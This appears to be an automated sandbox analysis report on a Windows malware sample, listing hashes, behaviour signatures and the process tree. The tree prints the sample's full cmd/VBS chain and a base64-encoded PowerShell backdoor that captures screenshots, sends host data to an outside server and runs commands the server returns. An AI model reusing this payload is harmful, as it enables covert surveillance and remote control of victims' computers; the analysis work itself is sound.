f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
10/04/2024, 15:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe
Size

479KB
MD5

4a967bbd28f5738185cf46a245918f77
SHA1

955f7ac2ed7ecdda927ae129b6d8f48ea58adee8
SHA256

f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8
SHA512

779231d3b2e84dcbc7662c11ab99194fae391ddb0a38c7add7c533085c636881baadc41327e9e76bfaee756c80efc2e330c28cea4f642b7e7f417b954e42fdfd
SSDEEP

3072:xThqisRMb6pjXTBb+3E5aA17K+P7KcCAZiwIzVHizrDgQJV+70AVIpMigKjubGT:fjs26Z26F7K+MAYZivDgQJk7OMigDbGT

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2440	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2444	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2444	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2140 wrote to memory of 856	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	28
PID 2140 wrote to memory of 856	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	28
PID 2140 wrote to memory of 856	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	28
PID 2140 wrote to memory of 856	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	28
PID 2140 wrote to memory of 2248	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	30
PID 2140 wrote to memory of 2248	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	30
PID 2140 wrote to memory of 2248	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	30
PID 2140 wrote to memory of 2248	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	30
PID 2140 wrote to memory of 2832	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	32
PID 2140 wrote to memory of 2832	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	32
PID 2140 wrote to memory of 2832	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	32
PID 2140 wrote to memory of 2832	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	32
PID 2832 wrote to memory of 2660	2832	cmd.exe	34
PID 2832 wrote to memory of 2660	2832	cmd.exe	34
PID 2832 wrote to memory of 2660	2832	cmd.exe	34
PID 2832 wrote to memory of 2660	2832	cmd.exe	34
PID 2140 wrote to memory of 2712	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	35
PID 2140 wrote to memory of 2712	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	35
PID 2140 wrote to memory of 2712	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	35
PID 2140 wrote to memory of 2712	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	35
PID 2140 wrote to memory of 1348	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	37
PID 2140 wrote to memory of 1348	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	37
PID 2140 wrote to memory of 1348	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	37
PID 2140 wrote to memory of 1348	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	37
PID 2660 wrote to memory of 2444	2660	WScript.exe	39
PID 2660 wrote to memory of 2444	2660	WScript.exe	39
PID 2660 wrote to memory of 2444	2660	WScript.exe	39
PID 2660 wrote to memory of 2444	2660	WScript.exe	39
PID 2140 wrote to memory of 2440	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	41
PID 2140 wrote to memory of 2440	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	41
PID 2140 wrote to memory of 2440	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	41
PID 2140 wrote to memory of 2440	2140	f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe	41

C:\Users\Admin\AppData\Local\Temp\f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe
"C:\Users\Admin\AppData\Local\Temp\f895adfe7882bac956f31ec14fb52ea118138257d4a95fb9e1bb6f4e846d07b8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo '5491.bmp>> C:\Users\Admin\AppData\Local\Temp\5491.bmp
  2⤵
  PID:856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y C:\Users\Admin\AppData\Local\Temp\5491.bmp C:\Users\Admin\AppData\Local\Temp\5491.bmp.vbs
  2⤵
  PID:2248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b C:\Users\Admin\AppData\Local\Temp\5491.bmp.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5491.bmp.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2660
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$aa='ZnVuY3Rpb24gUnVuQ29kZSgkY29kZSwkcmVzcG9uc2UpewogICAgW2J5dGVbXV0kYnl0ZXMgPSBuZXctb2JqZWN0IGJ5dGVbXSAkcmVzcG9uc2UuTGVuZ3RoOwogICAgZm9yKCRqPTA7ICRqIC1sdCAkcmVzcG9uc2UuY291bnQgOyAkaisrKXsKICAgICAgICAkbWFzc19lbGVtZW50PSAkaiAlICRjb2RlLkxlbmd0aDsKICAgICAgICAka2V5PSRjb2RlWyRtYXNzX2VsZW1lbnRdOwogICAgICAgICRieXRlc1skal0gPSAkcmVzcG9uc2VbJGpdIC1ieG9yICRrZXk7CiAgICB9OwogICAgJFVyaSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRieXRlcyk7CiAgICBzdGFydC1qb2IgewogICAgICAgICRzYyA9IE5ldy1PYmplY3QgLUNvbU9iamVjdCBNU1NjcmlwdENvbnRyb2wuU2NyaXB0Q29udHJvbC4xOwogICAgICAgICRzYy5UaW1lb3V0ID0gOTk5OTk5OyAkc2MuTGFuZ3VhZ2UgPSAnVkJTY3JpcHQnOyRzYy5BZGRDb2RlKCRhcmdzWzBdKQogICAgfSAtQXJndW1lbnRMaXN0ICRVcmkgLXJ1bmFzMzI7Cn0KJHNjcmVlbj0wOwp3aGlsZSgkY291bnQgLWxlIDQpewogICAgaWYoJHNjcmVlbiAtbGUgOSl7CiAgICAgICAgJHNjcmVlbisrOwogICAgICAgIFt2b2lkXVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiKTsKICAgICAgICAkc2l6ZSA9IFtXaW5kb3dzLkZvcm1zLlN5c3RlbUluZm9ybWF0aW9uXTo6VmlydHVhbFNjcmVlbjsKICAgICAgICAkYml0bWFwID0gbmV3LW9iamVjdCBEcmF3aW5nLkJpdG1hcCAkc2l6ZS53aWR0aCwgJHNpemUuaGVpZ2h0OwogICAgICAgICRncmFwaGljcyA9IFtEcmF3aW5nLkdyYXBoaWNzXTo6RnJvbUltYWdlKCRiaXRtYXApOwogICAgICAgICRncmFwaGljcy5Db3B5RnJvbVNjcmVlbigkc2l6ZS5sb2NhdGlvbixbRHJhd2luZy5Qb2ludF06OkVtcHR5LCAkc2l6ZS5zaXplKTsKICAgICAgICAkZ3JhcGhpY3MuRGlzcG9zZSgpOwogICAgICAgICRiaXRtYXAuU2F2ZSgiJGVudjpVU0VSUFJPRklMRVx0ZXN0LnBuZyIpOwogICAgICAgICRiaXRtYXAuRGlzcG9zZSgpOwogICAgICAgICRmaWxlID0gIiRlbnY6VVNFUlBST0ZJTEVcdGVzdC5wbmciOwogICAgICAgICRiYXNlNjRzdHJpbmcgPSBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtJTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRmaWxlKSk7CiAgICAgICAgUmVtb3ZlLUl0ZW0gLVBhdGggIiRlbnY6VVNFUlBST0ZJTEVcdGVzdC5wbmciLUZvcmNlOwogICAgfQogICAgZWxzZXsKICAgICAgICAkYmFzZTY0c3RyaW5nPSJzIgogICAgfQogICAgJFdlYkNsaWVudD0gTmV3LU9iamVjdCBuZXQud2ViY2xpZW50OwogICAgJHJuZHN0ciA9IC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDEwIHwgJSB7W2NoYXJdJF99KTsKICAgICR1cmwgPSAnaHR0cDovL2hlYXRvLnJ1L2luZGV4LnBocCc7CgogICAgJGE9R2V0LVdtaU9iamVjdCAtUXVlcnkgJCgic2VsZWN0ICogZnJvbSB3aW4zMl9sb2ciKyAiaWNhbGRpc2sgd2hlcmUgRGV2aWNlSUQ9JyRlbnY6U3lzdGVtRHJpdmUnIik7CiAgICBbc3RyaW5nXSRudW1iZXIgPSBbU3lzdGVtLkNvbnZlcnRdOjpUb1VJbnQzMigoJGEpLlZvbHVtZVNlcmlhbE51bWJlciwxNik7CiAgICAkYWFhID0gJGVudjpjb21wdXRlcm5hbWU7CiAgICAkYWFhID0gJGFhYSsiOyI7CiAgICAkYWFhID0gJGFhYSskbnVtYmVyOwogICAgJENvbGxlY3Rpb25zID0gTmV3LU9iamVjdCBTeXN0ZW0uQ29sbGVjdGlvbnMuU3BlY2lhbGl6ZWQuTmFtZVZhbHVlQ29sbGVjdGlvbjsKICAgICRDb2xsZWN0aW9ucy5BZGQoJCggImkiICsgJHJuZHN0ciksJGFhYSk7CiAgICAkQ29sbGVjdGlvbnMuQWRkKCJpbWciLCRiYXNlNjRzdHJpbmcpOwogICAgJHJlc3BvbnNlID0gJFdlYkNsaWVudC5VcGxvYWRWYWx1ZXMoJHVybCwkQ29sbGVjdGlvbnMpOwogICAgW3N0cmluZ10kVXJpID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJHJlc3BvbnNlKTsKICAgIGlmKCRVcmkuTGVuZ3RoIC1ndCAwKXsKICAgICAgICBpZigkVXJpWzBdIC1lcSAiISIgKXsKICAgICAgICAgICAgJGNtZCA9IGlleCAkVXJpLlN1YlN0cmluZygxKTsKICAgICAgICAgICAgJENvbGxlY3Rpb25zLkFkZCgiY21kIiwkY21kKTsKICAgICAgICAgICAgJHJlc3BvbnNlID0gJFdlYkNsaWVudC5VcGxvYWRWYWx1ZXMoJHVybCwkQ29sbGVjdGlvbnMpOwogICAgICAgIH0KICAgICAgICBlbHNlewogICAgICAgICAgICAkY29kZT0gKCRhKS5Wb2x1bWVTZXJpYWxOdW1iZXI7CiAgICAgICAgICAgUnVuQ29kZSAgICRjb2RlICRyZXNwb25zZQogICAgICAgIH0gCiAgICB9ClN0YXJ0LVNsZWVwIC1zIDE4MDsKfSA=';$couts =[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($aa)); $couts| iEx"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2444
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo .> C:\Users\Admin\AppData\Local\Temp\5491.bmp
  2⤵
  PID:2712
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo .> C:\Users\Admin\AppData\Local\Temp\5491.bmp.vbs
  2⤵
  PID:1348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
  2⤵
  - Deletes itself
  PID:2440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5491.bmp

Filesize
3KB

MD5
e41480145efd57b023fa990c7e5e0954

SHA1
bb0e824f734996b0f8a12525cda7518ac2900601

SHA256
f71bb5b393b6c1eab24aa69b2eb40ee071150d83572089a3579a0e0705c5b807

SHA512
f4c34bde1cd29cfcce01406f9ef56da99bf120410fdf3e0a5ba3800889af0114dd2203c4bab4b9376a7e6fa17bf3522cff7a643ac7a5da2d6f5d3ec7b9345562

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

Filesize
300B

MD5
a2f1aa2e2a098c21f130371350fc9b0a

SHA1
cd62577671783c004d98acfb7f4c5426e176fc81

SHA256
d39df99f037a4452a35d8acdb7855ef35fb142b147a93c59d6fa5b720c5ab9ba

SHA512
3517259266c4c9f2d18da19d60ff40b4bc5cb2bbd3711ae50ae1ef5e9a469628f6fd1532deb150d5abbe39b045cc69e36a2f947bccfce1c89df9f53f62b52f1e

Download Submit
memory/2444-48-0x00000000741C0000-0x000000007476B000-memory.dmp

Filesize
5.7MB

Download
memory/2444-50-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/2444-49-0x00000000741C0000-0x000000007476B000-memory.dmp

Filesize
5.7MB

Download
memory/2444-51-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/2444-52-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download
memory/2444-57-0x00000000741C0000-0x000000007476B000-memory.dmp

Filesize
5.7MB

Download
memory/2444-58-0x0000000002760000-0x00000000027A0000-memory.dmp

Filesize
256KB

Download